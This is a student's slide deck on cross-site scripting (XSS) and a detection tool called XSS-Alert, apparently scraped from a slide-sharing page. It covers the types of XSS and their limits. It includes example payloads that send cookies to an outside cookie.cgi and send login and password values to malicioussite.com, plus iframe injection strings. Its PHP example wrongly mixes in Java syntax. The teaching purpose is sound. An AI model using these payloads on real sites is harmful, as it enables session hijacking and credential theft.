XSS-Alert-Pentration testing tool

Cross Side Scripting (XSS) attack
detection for web application
http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701)
Department of Computer Science and Information Technology
Jaypee Institute of Information Technology
Sector-62 Noida ,Uttar Pradesh

Agenda
 Overview of XSS attack

 Type of XSS attack

 Example

 Limitation of attack

 DOM security overview

 XSS alert working model

 Demo

What is Cross Side Scripting (XSS)
Cross-site scripting (XSS) is a type of computer security vulnerability typically found
in web applications that enables malicious attackers to inject client side script into
web pages viewed by other.

Types:

1: Reflected XSS

2: Stored XSS

3: DOM based XSS

 Ranked #1 in OWASP 2007 top 10

 Ranked #2 in OWASP 2010 top 10

 7 out of 10 sites have XSS ( Jeremiah Grossman, White Hat website security
statistics report, Oct 2007 )

Reflected XSS
It detect all non-persistent XSS issues which occur when a web application blindly
echo parts of the HTTP request in the corresponding HTTP response HTML.

Example :

<?php
$name= request.getParameter(“name”);
echo “Hey”.$name;
?>

$name may contain javascript.

Stored XSS
It refers to all XSS vulnerabilities, where the adversary is able to permanently inject
the malicious script in the vulnerable application storage . The result is every user
that accesses the poisoned web page received the injected script without further
action by the adversary.

DOM-based XSS
It is special variant of the reflected XSS, where logic errors in legitimate JavaScript
and careless usage of the client-side data result in XSS coordination.

Invalidated input in XSS

Invalidated Input and resulted in a Cross-Site Scripting attack
and the theft of the administrator’s Cookies.

Types of Information leakage
Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-
bin/cookie.cgi?'%20+document.cookie</script >

Client can reveal posted form items to 3rd party (userID/passwd, etc)
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;
hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+
document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to trusted server
www.trustedserver.com/xss.asp?name =
<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>

Client can be tricked into attacking other sites
/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

Limitation of these attacks
 Usually only get one transaction with XSS code against vulnerable site
 Most attacks are only focused on collecting cookies
 POST based forms are seldom leveraged – almost always use GET methods
 Attacker does not know actual responses to client
 Some experts recommend using POST, hidden form inputs and other session
state info to limit XSS risks.

DOM Security Overview
 Child windows and same site trust
 Scripts can interact between the two windows
 Script content can be loaded from anywhere (RPC/Remote scripting is common)
 Images can be loaded from anywhere
 Javascript can either be within <script></script> tags, loaded elsewhere via
 <script src=remote.com>, or attacked to many tags
<img src=javascriptn load=javascript>
 Form GET/POST can be to another site or a javascript action
 XSS allows DOM abuse, but still follows DOM rules

Attack on Yahoo server with get string
“?q=”

XSS-Alert-Pentration testing tool

More Related Content

What's hot

Viewers also liked

Similar to XSS-Alert-Pentration testing tool

Recently uploaded

XSS-Alert-Pentration testing tool